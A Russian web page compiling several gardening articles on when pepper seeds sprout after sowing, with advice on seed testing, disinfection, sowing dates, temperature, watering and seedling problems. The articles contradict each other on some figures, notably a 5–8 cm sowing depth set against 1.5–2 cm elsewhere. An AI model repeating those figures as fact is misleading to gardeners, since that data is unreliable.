3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Через сколько дней всходят семена перцев после посева

Рассада перца: что действительно необходимо делать, а без чего можно обойтись

Сладкий перец выращивают на своих огородах далеко не все дачники, поскольку это не самая простая по агротехнике культура. Перец теплолюбив, имеет длительный вегетационный период. Вырастить его без стадии рассады можно очень редко: почти во всех регионах заботы о перце начинаются ещё зимой, а в марте семена высевают на рассаду.

Как выбрать семена и что с ними сделать в первую очередь

Уже к февралю у дачника должны быть готовы тара, грунт и семена для выращивания рассады перца. Многие опытные овощеводы из года в год пользуются своими семенами понравившихся им сортов, собирая их со спелых плодов в конце лета. Однако так можно поступать только в случае сортовых перцев: как бы ни были хороши гибриды первого поколения (обозначаемые как F1), брать от них семена бессмысленно: вырасти из таких семян может что угодно, таковы уж законы генетики.

Семена у перца крупные, работать с ними легко

В то же время многие современные гибриды настолько хороши как по урожайности, так и по устойчивости к неблагоприятным условиям, что всё больше огородников перестаёт экономить на семенах и покупает в магазине гибридные. Правда, в этом случае не стоит покупать семена от неизвестных фирм, хотя они и могут быть дешевле. В большинстве случаев семена гибридов выпускают уже готовыми к посеву, их подготовка силами дачника сводится к минимуму. Со своими семенами надо повозиться немного больше.

Впрочем, не всегда семена неизвестного происхождения не стоит использовать для посева, но тут уж — как повезёт! Пару раз на страх и риск высевал семена из купленных зимой в «Магните» понравившихся плодов, и результат был весьма неплохой.

Перед тем как начать что-либо делать с семенами, следует проверить их годность для посева. Семена перца сохраняют всхожесть в течение нескольких лет (при правильном хранении — до пяти), и дате, указанной на упаковке, обычно можно доверять. Свои же семена ещё зимой стоит проверить на всхожесть стандартным способом. Десяток семян (можно и меньше) складывают в тряпочку, хорошо смачивают её водой и помещают в любой неплотно закрытой ёмкости (удобнее всего — в чашке Петри) в тёплое место (например, около батареи), чтобы температура была не ниже 25 о С. Следят за тем, чтобы тряпочка не пересыхала, и проверяют состояние семян. Если через неделю большинство из них проклюнулись, семена можно использовать для посева.

Проращивание семян и проверку всхожести удобно проводить и на губке

Обработка и проращивание семян перед посадкой

Хорошие семена перца можно высевать на рассаду «как есть», прямо сухими. Сам я уже много лет только так и поступаю, поскольку опыт показывает, что большинство из описываемых в многочисленных статьях процедур лишь зря отнимают время, которого и так очень мало. Впрочем, навязывать своё мнение — не лучший подход, тем более что для семян сомнительного качества действительно желательны некие действия перед их посевом.

Из всех предлагаемых операций существенное значение в ряде случаев могут иметь:

Выполнять следует только то, что действительно покажется необходимым.

Калибровка

Когда это делать? Уже перед посевом, когда приготовлено всё, что для этого требуется. Семена у перца довольно крупные, и отобрать щуплые экземпляры можно даже вручную, с помощью пинцета. Их лучше не сажать. Хорошие производители даже не кладут в пакетики негодные семена. Ещё проще провести калибровку по плотности. Для этого почти все источники советуют использовать солёную воду (примерно ложку соли на литр воды), но можно прекрасно обойтись и чистой водой: плотность у неё ненамного ниже, чем у раствора поваренной соли. Семена, не утонувшие в течение 5–7 минут (при периодическом помешивании) лучше выбросить. Скорее всего, они тоже взойдут, но растения будут слабыми.

Обеззараживание

Обеззараживание необходимо в случае семян от своего урожая. Проводят его просто: семена высыпают в тёмный раствор марганцовки и держат его там 20–30 минут. Совет приготовить 1%-й раствор хорош, но как в большинстве случаев хозяин будет брать навеску препарата в 1 г или менее? Всё здесь очень приблизительно, но пользоваться светло-розовым раствором бессмысленно. Важно после обеззараживания как следует отмыть семена чистой водой. Кстати, зачем их перед этим калибровать? Тоже лишняя операция: негодные семена не утонут и в растворе марганцовки.

Раствор марганцовки такой концентрации брать для дезинфекции семян бесполезно: надо приготовить очень тёмный раствор

Вместо марганцовки можно пользоваться 3%-м раствором перекиси водорода, но его используют тёплым: при температуре около 35 о С, держат семена в таком растворе 10–15 минут. Другие, более экзотические, препараты специально для этой цели покупать ни к чему.

Закаливание

Если выращивание перца предполагается в теплице, то закаливание семян — излишняя мера. Если же в открытом грунте — полезная, хотя и не все специалисты по овощеводству горячо поддерживают это. Но, по крайней мере, не навредит. Чтобы закаливание имело смысл, надо дождаться, пока семена набухнут. Для этого их держат во влажной тряпочке и периодически проверяют: как только самые первые проклюнутся, все семена отправляют в холодильник.

Есть разные режимы закаливания. Пожалуй, оптимальный состоит в чередовании температур: 12 часов в холодильнике, 12 часов при комнатной температуре, после чего ещё два раза таким же образом. После этого можно проводить посев.

Другие процедуры

Можно встретить множество советов по дополнительной обработке семян перца. Всё это из серии «когда слишком много свободного времени». Ещё раз можно повториться: качественные семена взойдут и дадут крепкую рассаду вообще без обработки. Хотя замочить их и не очень сложно, но даст эта операция выигрыш в сроках появления всходов на 1–2 дня, и больше ничего. Прогревание у батареи, столь важное в случае семян многих сортов огурцов (увеличивает количество женских цветков) в случае перца абсолютно бессмысленно.

Из этой же области и совет использовать барботирование — продувание воздухом от компрессора воды, в которую пускают плавать семена. Эта мера существенно ускоряет появление всходов моркови, петрушки, сельдерея — культур, семена которых покрыты плотной эфирной оболочкой. Замачивание с продуванием позволяет разрушить её и вдвое ускорить прорастание семян. К перцу это не относится! И не стоит искать источник ультразвука, ведь и про это тоже можно иногда прочитать.

Некоторые прилежные огородники замачивают семена перца в препаратах, ускоряющих всхожесть и усиливающих иммунитет растений, например, в Эпине. Польза от этого, конечно, есть, но велика ли? Если очень хочется, проще и дешевле воспользоваться соком столетника (алоэ). Он действительно полезен, повышает адаптационные способности растений, защищает от инфекций. Но подготовить препарат надо правильно. Для этого алоэ держат неделю в темноте при низких положительных температурах, лишь затем отжимают сок из листьев. Сок смешивают пополам с водой и выдерживают в нём семена в течение суток.

Алоэ — прекрасный природный иммуномодулятор, но использовать его надо правильно

Посадка семян перца

Подготовленные семена высаживают на рассаду в комнатных условиях. В отличие, например, от капусты, которой требуется невысокая температура, для рассады перца в большинстве городских квартир условия вполне комфортные.

В какие сроки проводят посев

Даже в Болгарии перец выращивают в основном через рассаду, но это — чтобы раньше получить урожай. У нас без рассады обойтись трудно, но в сроках посева семян у специалистов появились разногласия.

Если совсем недавно считалось, что сеять надо во второй половине февраля, самое позднее — до 8 марта, то теперь господствует точка зрения, что спешить не надо. Большинство огородников переходит на посев семян в середине марта, чем уменьшает себе головную боль, связанную с недостатком света и тепла в феврале.

Для тепличного получения урожая закончить с посевом нужно в первой половине марта, иначе не будет никакого выигрыша во времени от теплицы, проще в мае купить рассаду. Для открытого грунта в средней полосе семена в стаканчики можно посеять вплоть до конца марта: ведь в грядку рассаду переносят только в начале лета. Если есть возможность посадить рассаду в мае (под временное укрытие), посев проводят раньше. Ориентир простой: посев — примерно за 2,5 месяца до высадки рассады. Это правило работает во всех климатических регионах.

Подходящая почва

Для выращивания десятка растений проще купить грунт для перца в магазине. При самостоятельном его приготовлении надо получить воздухо- и водопроницаемую смесь с большой концентрацией питательных элементов и нейтральной кислотностью. Для этого можно взять компост, речной песок и дерновую землю в соотношении 2:1:1 и добавить немного золы. Готовую смесь обязательно проливают розовым раствором марганцовки за день до посева семян.

Вместо перегноя подойдёт компост, вместо дерновой земли — любая плодородная, но не из грядки с паслёновыми культурами.

Перец не любит пикировку, поэтому обычно семена сеют сразу в индивидуальные стаканчики вместимостью от 300 мл. Впрочем, предварительный посев в общую коробку возможен, но рассаживают сеянцы в стаканчики (в фазе 2–3 настоящих листочков) аккуратно, с комом земли, не нарушая корней.

Торфяные горшочки — лучшая тара для рассады перца

Глубина заделывания семян

В каждый стаканчик кладут дренажный слой (1 см крупного песка), потом насыпают приготовленный грунт. Высевают семена на глубину 1,5–2 см. Если они уже проклюнулись, то по одному; сухие семена, если нет дефицита, лучше по два: потом лишние растения удаляют. Почву хорошо поливают тёплой водой и накрывают стаканчики стеклом или плёнкой. Ежедневно убирают со стекла конденсат и слегка проветривают содержимое стаканчиков.

Условия прорастания

Перец взойдёт при любой температуре выше 20 о С, но это может занять много времени. Оптимальна температура 24…28 о С. Свет при этом не обязателен, но дело в том, что сразу после появления «петелек» он нужен, и интенсивный. Если есть опасность прозевать всходы, лучше срезу поставить стаканчики в тепло и на свет.

Через сколько дней появляются всходы

При указанной температуре даже сухие семена большинства сортов прорастают через 7–10 дней, а всходов от пророщенных можно ожидать уже на четвёртые сутки. Важно не дожидаться появления всех всходов: после появления первых же росточков весь поддон со стаканчиками переносят в хорошо освещённое место с температурой 18–20 о С (ночью на 3–4 градуса ниже) и держат так дней пять.

Первая же «петелька» — сигнал к понижению температуры

Уход за всходами

Если в течение первых 5–6 дней не было слишком жарко и темно, сеянцы не вытянулись, дальше всё просто: рассаде нужен самый обычный уход. Пересадка проводится только в случае предварительного посева семян в общую коробку или если были взяты маленькие стаканчики и рассада перерастает, а в грядку сажать её ещё не позволяет погода.

Полив и подкормка

Рассаду перца поливают водой с температурой около 25 о С. Поливы проводят нечасто, 1–2 раза в неделю (в зависимости от условий), не допуская пересыхания грунта в стаканчиках. При поливах важно не замачивать листья, лить воду из маленького чайничка под корень. Время от времени в воду добавляют немного марганцовки (до светло-розового окрашивания).

Часто можно обойтись и без подкормок, но принято пару раз рассаду подкормить. Можно ограничиться настоем древесной золы. Первый раз подкормку вносят при образовании 4-го листка, второй — за 10–15 дней до высадки рассады в грядку. До подкормки и после неё необходим полив чистой водой.

Соблюдение температурного и светового режима

Всё время, кроме первой недели, надо стараться поддерживать температуру 23–26 о С днём и 18–20 о С — ночью. Если подоконник не направлен на север, заботиться о подсветке в марте-мае не надо. На северном подоконнике стоит оборудовать фитолампы, поскольку света от солнца рассаде может не хватать. Продлевать световой день не надо, речь может идти только об интенсивности света.

Подсветка нужна только в случае явного полумрака

Важно не забыть о закаливании рассады. За неделю до высадки в грядку её приучают к свежему воздуху, вынося ненадолго на балкон (сначала на 10–15 минут, затем до 3–4 часов). В это время не стоит и сильно поливать рассаду, чтобы она привыкала к трудностям. Высадка в грядку без укрытия возможна с наступлением настоящей летней погоды: почва должна прогреться до 14 о С, ночные температуры воздуха должны держаться как минимум на таком же уровне. На широте Москвы высадка в грунт раньше начала июня опасна.

Видео: способы посева семян перца на рассаду

Проблемы

Огородники со стажем не считают выращивание перечной рассады большой проблемой, у начинающих могут быть неприятности.

Семена не всходят

Если при оптимальной температуре семена не взошли и через 2 недели, надо скорее повторять посев: что-то пошло не так. Этого не может случиться при хороших семенах и правильном грунте. Поэтому для повторного посева надо проверить и то, и другое.

Сеянцы не растут

Сеянцы могут прекратить рост, если им холодно. Если проблема не в температуре, будет заметно что-то ещё. Так, при недостатке влаги листья будут увядать, при недостатке питания — менять окраску. Чаще всего проблема устранима, если дело не зашло слишком далеко. Надо срочно поправить условия: полить, подогреть, подкормить.

Сеянцы желтеют

Пожелтение листьев — сигнал плохой, но причин может быть много. Такое случается и при недостатке влаги, и при её избытке, при недостатке света или азота. Желтеют листья и от некачественного грунта (слишком тяжёлого или, наоборот, песчаного). При недостатке микроэлементов (марганца, цинка, железа) пожелтение начинается с макушки. Вредители редко забираются в квартиру, если только не были занесены с почвой. Это же касается и болезней. Поэтому причину пожелтения листьев надо искать в промахах хозяина и пытаться её устранить.

Вырастить рассаду перца не очень сложно, но есть нюансы. Они связаны как с правильной подготовкой семян и грунта к посеву, так и с последующим соблюдением всех условий выращивания. Начинающий огородник может где-то ошибиться, но с опытом выращивание рассады перестаёт быть сложным делом.

Сколько дней прорастает перец

Время, в течение которого прорастает перец с момента высадки семян, зависят от множества факторов. Важную роль играют и сроки посева состояние почвы и сам посевной материал. Рассмотрим, сколько дней всходит перец после посева.

Сколько дней прорастает перец

О всхожести

Всхожесть — это количество всходов по сравнению с объемами высеянных материалов. От него зависит способность семян давать качественную рассаду, а в будущем высокий урожай. Стопроцентной всхожести не может быть. Тем более что сладкий болгарский перец – это капризная культура.

Семена овоща сохраняют всхожесть на протяжении 3-4 лет. Наибольший процент она показывает в первый год. Поэтому стоит покупать только свежий посевной материал. Также надо обратить внимание на фирму, которая их произвела. Предпочтение стоит отдать более известной и зарекомендовавшей себя.

Прорастают семена перца различных сортов по-разному. Для того, чтобы выбрать сорт, нужно внимательно изучить характеристики желаемых для посадки видов. Это существенно облегчит выбор и даст знания о том, чего следует ждать от них. Перед посевом семена проверяют и улучшают. Всхожесть 1-го класса должна составлять не менее 80% – это соответствует государственному стандарту. В продажу могут поступать и семена 2-го класса (показатель 60%).

Что влияет на всхожесть

Условия, от которых зависит всхожесть:

  • степень вызревания посевного материала;
  • уборка и сушка;
  • Последующее хранение.

Качество семян

Недозрелые и пересушенные зернышки теряют всхожесть. Также во влажном помещении они могут стать стерильными, так как влага способствует подниманию температуры внутри их. От перегрева теряется способность прорастать.

Температурные условия

Важными являются условия, в которых будут выращивать рассаду. Температура в помещении должна составлять 25-28˚С. При низких показателях всходы перца появляются очень медленно. Также плохо влияют сквозняки и резкие перепады температуры.

Почва

Почва должна быть рыхлой, воздухо- и влагопроницаемой. Ее температурные показатели мают находиться на уровне 20-25˚С. Если сосуд с грунтом стоит на холодном подоконнике, надо под него положить доску. Это делают для того, чтобы предупредить переохлаждение земли.

Воздухообмен

Почву нужно хорошо поливать, но умеренно. От избытка влаги воздух плохо поступает к зернышкам, они могут просто задохнуться. Качественный посевной материал тогда гибнет. Для свободного доступа воздуха надо делать частые проветривания помещения.

Глубина

Когда слишком долго не всходит перец, причина может крыться в глубине его посадки. Оптимальное расстояние рассчитывают так: размер семечки умножить на 3. Правильно углубленные семена могут переместиться ниже, если полив производят После посева, а не до него.

Обработка семян

Обработанный посевной материал всходит позже. Дражжирование и инкрустирование семян замедляет прорастание. После обработки их хорошо просушивают, а это влияет на всхожесть.

Если обеспечены все условия, то время необходимое для прорастания семян сладкого перца будет составлять около 7-15 дней. Иногда на проклюнувшихся ростках остается семенная оболочка, которую нельзя трогать, чтобы не повредить растение. Она отпадет сама.

Как проверить семена на всхожесть

Все семена проросли

Не стоит ждать, когда подойдет время посадки. Определить процент прорастания можно сразу после покупки. Тогда некачественный посевной материал успевают заменить. Вместе со всхожестью проверяют энергию прорастания – насколько равномерно появляются ростки.

Для этого зернышки помещают на влажную марлю. Удобно будет брать по 10 или 20 штук. Тогда легко будет посчитать процент проклюнувшихся семян. Он будет влиять на количество внесенных зернышек во время посадки. Если плохо всходят семена перца, их нужно сеять больше.

Также можно провести калибровку. Зернышки выстилают на бумаге, самые мелкие отбирают. Дальше сортируют – пустотелые отличают от наполненных. Для этого готовят такой раствор:

  • 2 ст. л. поваренной соли;
  • 1 ст. воды.

Зернышки опускают в жидкость. Через 7-10 минут некачественные всплывут. Те, что опустятся на дно, отбирают для высевания. Их извлекают, промывают пресной водой и просушивают. Калибровку производят непосредственно перед посевом.

Как ускорить прорастание семян

Чтобы улучшить качество посевного материала, можно провести ряд процедур. Они способствуют сокращению периода всходов, а значит всходит салатный перец намного быстрее, а сеянцы растут крепкие и здоровые.

Обеззараживание

Такая процедура необходима, если семена непротравленные. Дезинфицирование убывает разного рода грибки и бактерии, которые вызывают в будущем болезни у растений. В качестве жидкости для протравливания применяют 1-2% раствор марганцовки, в который окунают завернутые в марлю семечки. Через 20 минут их извлекают, промывают под проточной водой и просушивают.

Для обеззараживания используют покупные вещества. Можно взять препарат «Фитоспорин-М». Его в количестве 4 капель дают на стакан воды. Средство хорошо справляется с разными возбудителями заболеваний. Чтобы семена не потеряли посевные качества, не стоит проводить процедуру раньше чем за 2 дня до посадки.

Насыщение семян питательными элементами

Перец должен иметь силу для хорошего развития. Поэтому еще на этапе подготовки посевного материала улучшают их качество. Для этого используют как органические, так и химические средства:

  1. Зольная вода – 20 г древесного пепла добавляют в стакан воды, настаивают 1 день. Это вещество очень эффективное, ведь содержит много полезных микроэлементов. Обработку совершают на протяжении 5 часов.
  2. Куриное яйцо и сок алоэ – можно совмещать или применять отдельно, средством заливают зернышки.
  3. Препараты «Циркон», «Ивин», «Эпин» – используют по инструкции, которая прилагается.

Стимуляторы роста обеспечивают быстрые всходы. Растения отлично развиваются и имеют стойкий иммунитет к заболеваниям.

Прогревание

Зернышки оставляют на хорошо прогреваемом подоконнике или окунают в нагретую до 40˚С воду. Для поддержания постоянной температуры используют термос. Тогда семена болгарского перца быстрее прорастают, ведь при подогреве активизируются процессы роста.

Проращивание

Для прорастания потребуется намного меньше времени, если предварительно замочить посевной материал. Для этого берут марлю (бинт), складывают в несколько слоев. Сверху укладывают семена, разравнивают, укрывают. Смачивают водой. Отлично подойдет талая. Если ее нет, можно взять отстоянную.

Надо следить, чтобы марля всегда оставалась влажной. Для этого ее помещают в пластиковый сосуд с крышкой, которую открывают каждый день для проветривания. Температура в помещении, где содержится емкость, должна составлять 25-28˚С. Зернышки прорастают примерно через 7-10 дней, в зависимости от сорта.

При выращивании в домашних условиях через сколько дней после посева всходят семена перца на рассаду? Почему погибает?

Перец относится к светолюбивым овощам, которым для успешного произрастания нужна определенная температура. Здоровая и крепкая рассада – залог получения хорошего урожая перца. Однако для того, чтобы вырастить хорошую рассаду, необходимо потратить много времени и приложить определенные усилия.

Когда по времени должен всходит сладкий и горький перец после посадки?

Сколько дней всходит рассада перца:

Оптимальное время посадки семян перца на рассаду – средина февраля. Основные подготовительные действия при посеве семечек:

  • Температура не менее 23-25 градусов Цельсия;
  • Правильная обработка посадочного материала – обеззараживание в марганцовке, замачивание в стимуляторах роста;
  • Наличие легкого и питательного грунта.

Первые всходы молодых перчиков обычно появляются через 5-16 суток после высадки семечек.

Проклевывающиеся росточки внешне представляют собой петельку из стебелька. Немного позже появляются семядольные листики, на которых очень часто находится семенная оболочка. Многие начинающие огородники пытаются убрать оболочку самостоятельно. Этого делать не следует, поскольку в процессе роста перец самостоятельно справится с семенной оболочкой, а ее удаление может привести к повреждению нежного ростка.

Обычно хватает 14-15 дней для того, чтобы все высаженные семечки проклюнулись.

Когда можно снимать пленку с болгарского перца?

Полиэтиленовая пленка при выращивании рассады перца играет роль мини-парника. После того, как семечки поместят во влажный грунт, посадки необходимо накрыть тонким полиэтиленом. Для проращивания посадочный материал необходимо поместить в теплое помещение с температурой не ниже 23 градусов Цельсия.

После того, как на поверхности емкостей появятся молодые ростки, полиэтиленовую пленку убирают вначале на несколько минут. По мере роста всходов время снятия полиэтилена увеличивается. Таким образом, молодые перцы привыкают к условиям окружающей среды.

Опыт огородника:

Уход за проклюнувшимися росточками или что делать когда взошел перец?

После появления всходов основные правила ухода заключаются в своевременном поливе и регулярном освещении. Эти два фактора имеют большое значение при выращивании рассады перца для формирования здоровых растений, дающих в будущем хороший урожай.

Влажность почвы нужно регулярно и тщательно контролировать. Овощная культура любит влагу, но переувлажнение грунта губительно для молодых растений, как и пересыхание почвы.

Перец – овощная культура короткого светового дня, поэтому для растений необходимо интенсивное освещение. При этом продолжительность освещения для культуры должна составлять не менее 10-12 часов.

Опытные овощеводы рекомендуют после 18:00 накрывать рассаду светонепроницаемыми ящиками. Эта процедура обеспечит молодым растениям:

  • Иммунитет к различным заболеваниям;
  • Более быстрое привыкание к новому месту произрастания;
  • Устойчивость к колебаниям температуры.

Почему не растет рассада перцев?

Часто возникает ситуация, что при видимом соблюдении правил посадки семена не взошли. Причинами могут быть следующие факторы:

  • Неправильная подготовка грунта. Почва может быть слишком тяжелой для перца или закисленной;
  • Низкое качество семечек. Посевной материал капризной овощной культуры плохо сохраняет всхожесть, поэтому его нельзя закупать впрок и хранить их на протяжении длительного времени;
  • Пересыхание почвы. В этом случае даже взошедший посадочный материал может погибнуть при недостатке жидкости;
  • Несоблюдение необходимой температуры для прорастания семян.

При высокой влажности земли и отсутствии вентиляции всходы погибают.

Плохо растет, что делать?

Высаженные семечки успешно проклюнулись и появились всходы. Однако что-то пошло не так: развитие ростков замедлилось, зелень потеряла свой интенсивный зеленый цвет или перцы и вовсе погибли.

Причина плохого роста рассады заключается в типичных ошибках, допущенных при уходе:

  • Неправильный режим полива. Перец – влаголюбивое растение, которое не переносит пересыхания грунта;
  • Недостаточное освещение. При отсутствии надлежащего освещения саженцы вытягиваются и ослабевают. Поэтому при сумрачной и пасмурной температуре рассаду необходимо подсвечивать фотолампами;
  • Неправильный режим питания рассады. Для исправления ситуации молодые перцы подкармливают гуматом калия или специальными жидкими минеральными комплексами.

Почему гибнет?

Существует несколько причин увядания и гибели саженцев:

  • Покупка почвы в неспециализированных магазинах;
  • Повышенная влажность почвенной смеси. Переизбыток воды в грунте влечет за собой гниение корневой системы, появления опасной болезни «черная ножка»;
  • Сухой воздух в помещении. Частой причиной гибели рассады является хранение емкостей на подоконнике, под радиатором отопления. В этом случае перцы достаточно переставить на более подходящее место;
  • Некачественный грунт. Почвенную смесь для высадки семян необходимо готовить с соблюдением рекомендаций специалистов. Также нельзя использовать землю с грядок, где ранее произрастали томаты, баклажаны или картофель.

Четкое соблюдение правил ухода за рассадой позволит овощеводу вырастить хороший урожай перца.

Как обеспечить правильный уход за рассадой перца после всходов семян

Болгарский и острый перец – прихотливые растения, требующие правильного ухода на любом этапе развития растения. Еще перед посадкой следует грамотно подготовить семена, так как от этого зависит их всхожесть и здоровье будущих ростков. Не менее важно точно подготовить грунт для посева, соблюдать сроки высаживания. Срок появления первых всходов рассады зависит от многих факторов – особенности сорта, климатические условия, качество посадочного материала. Чтобы ускорить этот процесс, следует соблюдать алгоритм заделки, выбрать и обработать посадочный материал.

Сроки всхожести семян – как быстро после высадки дома на подоконнике

Сроки и качество прорастания посадочного материала в первую очередь зависят от сорта перца. Для большинства культурных разновидностей (их выращивают для получения плодов) этот период составляет 6-15 дней с момента проведения посева. Про лучшие сорта семян болгарского перца узнайте здесь.

Чем качественнее, свежее и устойчивее семена, тем быстрее они всходят и формируют здоровое растение. Есть несколько методов, как укорить данный процесс – предпосевная обработка, применение стимуляторов, выбор сбалансированного субстрата. Для формирования крепкой, дружной и здоровой рассады требуется правильного подготовить семена, последовательно соблюдать алгоритм посадки. Про выращивание рассады перца сладкого из семян в домашних условиях читайте в этом материале.

Сроки созревания, указанные на упаковке с семенами, определяются по результатам лабораторных и полевых экспериментов. Конкретный период может отличаться из-за хранения и транспортировки, в зависимости от климата в регионе.

От чего зависит скорость прорастания

Качество и скорость появления всходов перца зависит от множества внешних факторов. Наиболее важные из них:

  1. Температура воздуха. Перец – теплолюбивая культура, прорастание семян происходит при температуре от 18 до 30 o C. Чем выше значение, тем быстрее появятся ростки.
  2. Температура и качество грунта. Для комфортного развития всходов земля должна быть прогрета минимум на 18 o C. Для выращивания рассады следует брать только питательный, легкий и плодородный субстрат. Лучше всего воспользоваться готовыми магазинными смесями.
  3. Освещение. Для формирования рассады требуется хорошее освещение. Световой день должен быть не менее 8 часов, зимой рекомендуется использовать лампу для подсветки.
  4. Влажность. После посева емкости с семенами укрывают пленкой для сохранения и повышения влажности. Земля должна быть постоянно увлажненной, что требуется для размягчения оболочки, насыщения семядолей.
  5. Глубина заделки. Чтобы добиться быстрого появления всходов, семена перца нужно заделывать на глубину от 5 до 8 см. Если выложить материал на поверхность, не сформируются корни, при более глубокой посадке есть риск загнивания.

На скорость прорастания влияют плотность грунта, качество посадочного материал, предпосевная обработка. Если ростки не появляются более 2 недель, следует нормализовать микроклимат в помещении или теплице.

Если вы проращиваете семена в парнике или теплице, еще перед началом работы рекомендуется обновить верхний слой грунта. Это усилит плодородность земли и снизит риск заражения болезнями, вредителями.

Через сколько всходят семена сладкого болгарского перца на рассаду, на какой день

Все сорта и гибридные формы сладкого перца всходят в течение 7-15 дней с момента посадки. Конкретный период всегда указывают на упаковке с посадочным материалом. Если вы выращиваете рассаду дома для последующей пикировки в открытый грунт, посев рекомендуется проводить в первую неделю февраля. Ко второй половине мая все сеянцы будут готовы к пересадке на постоянное место.

Через какое время и при какой температуре взойдут семена острого – максимальный срок

Культурные разновидности острого перца всходят так же, как и сорта сладкого (болгарского) – 7-15 суток с заделки в грунт при температуре 18-25 o C. Именно данную форму культуры используют в качестве декоративного растения для выращивания в доме. Такие разновидности перца имеют увеличенный срок прорастания, всходы формируются менее дружно, медленно развиваются. Их сеянцы могут формироваться более 2 недель, обязательно контролировать микроклимат в помещении, следить за состоянием грунта.

Какие семена перца лучше всходят – свежие или старые

Всхожесть семян перца сохраняется до 3 лет при правильном сборе, хранении и транспортировки. С каждым годом качество материала уменьшается, поэтому для выращивания рассады (особенно редких сортов) не рекомендуется использовать старые экземпляры.

При возможности рекомендуется использовать свои семена, полученные после сбора урожая. Их нужно осторожно извлечь из перца, затем просушить и убрать в темное место для последующего хранения. Емкость должна проветриваться, лучше использовать пластиковый контейнер или пакет с проделанными отверстиями.

При выборе семян в магазине следует обращать внимание не только на сроки годности, но и состояние упаковки. На ней не должно быть признаков вскрытия, механических повреждений.

Как проверить и правильно определить всхожесть в домашних условиях

Перед началом посева семена следует откалибровать – выбрать наиболее крупные и внешне здоровые экземпляры. На оболочке не должно быть трещин, признаков гниения и пятен.

После визуального осмотра можно приступать к проверке на всхожесть. Самый эффективный метод – предварительное проращивание. Для этого семена помещают на блюдце между двумя слоями бумажных салфеток или влажных дисков. Емкость накрывают пленкой, затем убирают в теплое и темное место. Следует регулярно проверять уровень влажности, не допускается застоя воды – это приводит к гниению семядолей. Ростки в норме должны появиться в течение 4-5 дней, для поздних и декоративных сортов перца процесс может занять до 2 недель. Про посадку перца на рассаду в улитку расскажет эта статья.

Соленой воде

Пустотелые семена не могут взойти, так как внутри нет достаточного количества питательных веществ. Чтобы проверить посадочный материал, можно использовать солевой раствор. Для этого нужно в 200 мл воды добавить 1 ст. л. обычной поваренной соли, затем погрузить туда семена. Здоровые и качественные экземпляры должны быстро опуститься на дно, а пустые остаются на поверхности. Для ускорения процесса жидкость можно слегка помешивать палочкой. После проверки здоровые семена промыть проточной водой.

Плохая всхожесть или семена вовсе не взошли – что делать

При использовании некачественного или старого посадочного материала можно остаться без рассады перца или получить растения с низкой урожайностью. Есть несколько методов, как усилить всхожесть семян. Для этого используют различные стимуляторы, домашние методы.

Как ускорить и улучшить процесс перед тем, как посадить

Самый надежный и эффективный метод усиления всхожести семян перца – предпосевная обработка стимуляторами роста. Для этой цели используют готовые препараты, например, Эпин-экстра, Корневин, Циркон, гумат натрия. Посадочный материал погружают в предварительно подготовленный раствор на срок, написанный в инструкции. Средняя продолжительность процедуры – 8 часов.

На стадии рассады увеличивается риск заражения болезнями и вредителями. Чтобы избежать гибели молодых растений, семена следует обеззараживать перед посевом. Для этого применяют раствор марганцовки, медицинский спирт или ошпаривание кипятком.

Грунт для выращивания рассады перед посадкой нужно прогреть в духовке, обильно полить марганцовкой или использовать готовые препараты для профилактики заражения.

Перекисью водорода

Для домашней обработки семян применяют 3% раствор перекиси водорода. Препарат активно уничтожает возбудителей болезней, улучшает всхожесть перца. Этот метод увеличивает иммунитет сеянцев, они формируются более крепкими и реже заражаются болезнями. Оптимальное время замачивания – 20 минут, после процедуры посадочный материал следует промыть чистой водой.

Сколько лет сохраняется всхожесть семян – срок годности

При соблюдении всех правил хранения семена сладкого и острого перца сохраняют всхожесть до 3 лет. Посадочный материал нужно держать в закрытой и дышащей таре, избегать температурного, химического или механического воздействия. Повышенная влажность и прямые солнечные лучи ухудшают способность к прорастанию, поэтому место для хранения должно быть сухим, темным.

Что делать с рассадой перца после всходов – как ухаживать

Правильный уход за сеянцами в первые два месяца требуются для формирования здоровых, крепких и урожайных растений. Ростки имеют слабый иммунитет, все силы уходят на развития листьев, корневой системы. Требуется качественный полив, применение удобрений для стимуляции роста. Как пересадить рассаду перца в горшок читайте тут.

Подкормка – как подкармливать пророщенные семена

Вне зависимости от состава и качества грунта первую подкормку рекомендуется проводить через неделю после появления ростов. Лучше всего использовать готовые сбалансированные составы, содержащие все необходимые макро- и микроэлементы. Если вы используете односоставные подкормки, предпочтение стоит отдать азотно-калийным смесям. Из народных методов наибольшей эффективностью обладает зольный раствор, водный настой коровяка, разбавленный в пропорции 1:12.

Как поливать, в какой период необходимо увеличивать полив после посева

Грунт для рассады должен быть постоянно влажным, нельзя допускать застоя воды. Полив должен быть регулярным и стабильным. Лучше всего использовать пульверизатор, чтобы избежать размывания грунта в прикорневой части. Оптимальная частота процедур – 2-3 раза в неделю.

Чтобы сохранить необходимую влажность субстрата во время поездки, воду нужно наливать в подставку емкости. Рядом с рассадой можно дополнительно оставить чашу с жидкостью, влажную гальку, керамзит.

Ошибки садоводов-новичков по уходу

Выращивание рассады перца – сложный процесс, от которого напрямую зависит объем будущего урожая. На этом этапе развития растений легко допустить ошибки, приводящие к гибели всей посадки. Опытные садоводы рекомендуют соблюдать сроки посева, использовать уже готовые субстраты для посадки и применять только магазинные стимуляторы, подкормки. Это позволяет избежать дисбаланса химического состава, что пагубно влияет на развитие всходов.

Почему пропадает и гибнет рассада после всходов после посадки

Рассада имеет слабый иммунитет, может погибнуть на фоне множества факторов. Основные причины, почему сеянцы чахнут:

  • недостаточная или чрезмерная влажность грунта;
  • заражение болезнями, вредителями;
  • некачественный посадочный материал;
  • недостаток освещения в помещении;
  • несоблюдение температурного режима.

Нередко рассада гибнет после переохлаждения. В первый месяц выращивания перца следует избегать сквозняков, воздействия низких температур.

Рассада перца сильно вытянулась после всходов

Выделяют две основные причины вытягивания рассады перца – избыток азота в грунте, выращивание растений в затемненном месте. Если вы заметили, что стебель формируется слишком быстро, а листья мелкие, следует скорректировать объем освещения. Желательно отказаться от подкормок азотными составами, в качестве удобрения использовать только фосфорно-калийные смеси. В редких случаях перец вытягивается при загущенной посадке, в такой ситуации достаточно проредить всходы. Про посадку острого перца на рассаду расскажет эта ссылка.

Видео

Про уход за рассадой перца смотрите в этом видео

Через сколько дней всходят семена перцев после посева

